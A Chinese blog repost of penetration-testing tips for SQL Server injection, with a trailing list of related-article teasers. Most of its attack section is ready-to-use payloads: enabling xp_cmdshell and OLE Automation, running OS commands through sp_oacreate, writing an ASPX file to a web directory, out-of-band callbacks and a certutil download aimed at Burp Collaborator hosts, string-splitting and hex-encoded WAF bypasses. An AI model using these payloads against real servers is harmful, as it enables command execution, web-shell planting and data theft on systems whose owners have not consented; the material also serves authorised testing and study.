Sql server注入一些tips

Sql server注入一些tips 数据库入门数据库基础教程数据库 mysql 2017-02-25 02:02:02 321人浏览无得

摘要

　　 SQL Server环境测试: 几个特性: 1.sql server兼容性可以说是最差的。举例: select x from y where id=1 字符串查询 select x from y wh

Sql server注入一些tips
[数据库教程]

SQL Server环境测试:
几个特性:
1.sql server兼容性可以说是最差的。
举例:
select x from y where id=1
字符串查询
select x from y where id=‘1‘

这是会报错的,不允许的
select x from y where id="1"
假设y表有列名name,那么
select x from y where id="name" 为真。
那么利用这个特性我们可以爆破这个表的列名。
sql server下,挖掘注入就是用单引号(‘),双引号的场景很少,但是也有。

sql server不支持‘1‘-‘1‘=0这种运算，他会认为你是错误的，两个字符串无法进行相减,如果你是‘1‘-0他会进行类型转换不会出错。


修改:
update x set name=‘admin‘ where id=1
如果id处存在注入，那么本质上就是个where条件查询注入，查询怎么注入他就怎么注入。


update x set name="admin" where id=1 
他会报错，没有人会这样写,用双引号。

测试sql server 修改注入,只能是‘aaa‘+‘bbb‘=aaabbb，如果可以就是注入。 或者是‘aaa‘‘ 和‘aaa‘‘‘
除order by/group by外注入:
环境场景:当输入id->输出id相关数据,输入name，出现name相关数据，可能是order by还有可能是什么?
""是sql servr标识符,而不是字符串,他和Mysql不一样
还有可能是这样的: select "name" from x
那么你可以这样去探测:name","id


总结:测试sql server注入使用双引号测试的场景很少,尝试"是不明智的

　　　　sql server注入到命令执行一些tips:

基础:
开启xp_cmdshell
EXEC sp_configure ‘show advanced options‘, 1;RECONFIGURE;EXEC sp_configure ‘xp_cmdshell‘, 1;RECONFIGURE;

执行命令:
exec master..xp_cmdshell ‘ping dnslog‘

2.启用sp_oacreate
EXEC sp_configure ‘show advanced options‘, 1;   
RECONFIGURE WITH OVERRIDE;   
EXEC sp_configure ‘Ole Automation Procedures‘, 1;   
RECONFIGURE WITH OVERRIDE;

执行命令:
declare @shell int exec sp_oacreate ‘wscript.shell‘,@shell output exec sp_oamethod @shell,‘run‘,null,‘c:windowssystem32cmd.exe /c whoami >c:1.txt‘

;declare+%40shell+int+exec+sp_oacreate+‘wscript.shell‘,%40shell+output+exec+sp_oamethod+%40shell,‘run‘,null,‘c%3awindowssystem32
slookup.exe%20"Http://2ruqida2pbiyia3mnwnsaiadu40vok.burpcollaborator.net"‘;


;declare+@f+int,@g+int;exec+sp_oacreate+%27Scripting.FileSystemObject%27,@f+output;EXEC+SP_OAMETHOD+@f,%27CreateTextFile%27,@f+OUTPUT,%27d:Dztsztadmin65.txt%27,1;EXEC+sp_oamethod+@f,%27WriteLine%27,null,%27<%@+Page+Language="C%23"%><%+Response.Write("hello,world");+%>%27--
3.调用sp_oamethod

关于bypass:
exec=execute
原语句:execute master..xp_dirtree ‘c:‘
改造:execute(‘master..xp_dirtree "c:" ‘)
再次改造:execute(‘master..xp_dirtree "im86rc9bogsvyfv87zip9sz34uaky9.burpcollaborator.net"‘ )

　　技术图片

bypass执行命令:
‘;execute(‘xp_c‘%2b‘mdshell " certutil.exe -urlcache -split -f http://cyen6bl8kg2svupmggzc6dk1zs5it7.burpcollaborator.net"‘);--%20111

开启xp_cmdshell bypass:
execute("sp_configure ‘show advanced options‘, 1");RECONFIGURE;execute("sp_configure ‘xp_cmdshell‘, 1;RECONFIGURE");

sql server专属特性:
select 1e1select user 
相当于执行select 1e1 和select user,bypass waf
‘select 1e1declare @s varchar (8000) set @s=0x77616974666F722064656C61792027303A303A3227 exec (@s) -- a


案例:
aspx/.net站点支持get/post/cookie

　　把get参数放到cookie中: 技术图片

Sql server注入一些tips

原文地址：https://www.cnblogs.com/piaomiaohonGChen/p/14602368.html

您可能感兴趣的文档:

--结束END--

本文标题: Sql server注入一些tips

本文链接: https://lsjlt.com/news/8133.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

猜你喜欢

Sql server注入一些tips

　　 sql server环境测试: 几个特性: 1.sql server兼容性可以说是最差的。举例: select x from y where id=1 字符串查询 select x from y wh...

99+

2017-02-25

Sql server注入一些tips 数据库入门数据库基础教程数据库 mysql
第一次SQL注入

第一次sql注入 1.在sqlmap文件安装目录下输入打开cmd，输入： sqlmap.py 2. sqlmap.py -u url（url：目标地址） sqlmap.py -u http:/...

99+

2018-06-28

第一次SQL注入数据库入门数据库基础教程数据库 mysql
简单聊一聊SQL注入及防止SQL注入

目录SQL注入附防止sql注入的一些建议总结SQL注入 SQL注入是通过操作输入来修改事先定义好的SQL语句，对用户输入的字符串进行过滤，转义，限制或处理不严谨，导致用户可以通过输入...

99+

2024-04-02
什么是SQL注入如何在SQL Server中防止它

SQL注入是一种针对数据库的攻击技术，攻击者利用Web应用程序中的漏洞向数据库中插入恶意的SQL查询，以获取对数据库的非法访问权限或篡改数据。在SQL Server中可以通过以下方法来防止SQL注入：使用参数化查询：参数化查询是一种将...

99+

2024-06-04

sql server
SQL Server中WAITFOR DELAY注入的示例分析

这篇文章主要为大家展示了“SQL Server中WAITFOR DELAY注入的示例分析”，内容简而易懂，条理清晰，希望能够帮助大家解决疑惑，下面让小编带领大家一起研究并学习一下“SQL Server中WAITFOR DELAY注入的示例分...

99+

2023-06-04
sql注入语句有哪些

sql注入语句有：返回的是连接的数据库名：and db_name()>0获取连接用户名：and user>0将数据库备份到Web目录下面：;backup database 数据库名 to disk='c:\inetpub\wwwroot\1...

99+

2024-04-02
sql注入有哪些参数

sql注入参数有：user(): 数据库用户，格式为user() @serverdatabase(): 当前数据库名称version(): 当前数据版本，例如5.x.x-n1等@@datadir: 数据库路径，通常用于load_file时猜...

99+

2024-04-02
SQL注入

&...

99+

2024-04-02
sql注入 --显错注入

前提知识数据库:就是将大量数据把保存起来，通过计算机加工而成的可以高效访问数据库的数据集合数据库结构:库：就是一堆表组成的数据集合表：类似 Excel，由行和列组成的二维表字段：表中的列称为字段记录：表中的行称为记录单元格：行和列相交的地...

99+

2021-01-16

sql注入 --显错注入数据库入门数据库基础教程数据库 mysql
一文了解pikachu的SQL注入

前言：本文章主要讲解关于pikachu的注入方式。目录前言：一、数字型注入（post）二、字符型注入（get）三、搜索型注入四、xx型注入五、"insert/update"注入六、"delete"注入七、"http he...

99+

2023-10-04

sql 数据库 mysql
一文搞懂SQL注入攻击

目录1. 前言2. SQL注入简介（1）SQL语言（2）SQL注入3. SQL注入步骤（1）发现漏洞（2）信息收集（3）攻击Web系统（猜解用户名和密码）（4）获取管理员权限4. 防范SQL注入（1）使用参数化查询或存储...

99+

2023-04-19

SQL注入攻击 SQL注入
SQL注入的原理有哪些

本篇文章给大家分享的是有关SQL注入的原理有哪些，小编觉得挺实用的，因此分享给大家学习，希望大家阅读完这篇文章后可以有所收获，话不多说，跟着小编一起来看看吧。一、什么是sql注入？1、什么是sql注入呢？&...

99+

2024-04-02
sql注入的方式有哪些

这篇文章主要讲解了“sql注入的方式有哪些”，文中的讲解内容简单清晰，易于学习与理解，下面请大家跟着小编的思路慢慢深入，一起来研究和学习“sql注入的方式有哪些”吧！ sql注入...

99+

2024-04-02
SQL Server数据库sql优化注意事项都有哪些

SQL Server数据库sql优化注意事项都有哪些，相信很多没有经验的人对此束手无策，为此本文总结了问题出现的原因和解决方法，通过这篇文章希望你能解决这个问题。今天主要分享下sqlserver数据库在做s...

99+

2024-04-02
sql注入之堆叠注入

一、堆叠注入的原理 mysql数据库sql语句的默认结束符是以";"号结尾，在执行多条sql语句时就要使用结束符隔开,而堆叠注入其实就是通过结束符来执行多条sql语句比如我们在mysql的命令行...

99+

2023-09-09

sql mysql php 信息安全网络安全
SQL注入--盲注及报错注入

盲注查询盲注其实就是没有回显，不能直观地得到结果来调整注入数据，只能通过其他方式来得到是否注入成功，主要是利用了一些数据库内置函数来达到的布尔盲注布尔很明显Ture跟Fales，也就是说它只会根据你的注入信息返回Ture...

99+

2014-11-30

SQL注入--盲注及报错注入
一文讲解Node+mysql对SQL注入

虽然现在不会直接使用原生NodeJS 的方式开发后台，但了解一下 SQL注入还是很有必要的。本文使用 NodeJS + MySQL 对 SQL注入进行讲解。SQL注入攻击是很古老的攻击方式了，自从 web2.0 诞生后就有 SQL注...

99+

2022-11-22

Node.js 后端
pikachu---SQL注入

1、产生原因 SQL注入漏洞，主要是开发人员在构建代码时，没有对输入边界进行安全考虑，导致攻击者可以通过合法的输入点提交一些精心构造的语句，从而欺骗后台数据库对其进行执行，导致数据库信息泄漏的一种漏洞。 2、攻击流程 3、注入点类型 ...

99+

2014-12-28

pikachu---SQL注入数据库入门数据库基础教程
php sql注入

文章目录一、什么是sql注入二、sql注入处理1、使用内置函数2、使用pdo预处理语句三、安全注意事项一、什么是sql注入在应用程序中，为了和用户交互，允许用户提交输入数...

99+

2023-08-30

sql php mysql php sql 注入 sql 注入
SQL注入进阶-order by注入

目录 01-Order By简介 02-Order By注入场景 03-Order By注入姿势 03.1-结合union select进行盲注 03.2-结合if()进行盲注 03.3-结合if() + sleep()进行盲注 ...

99+

2023-08-31

sql php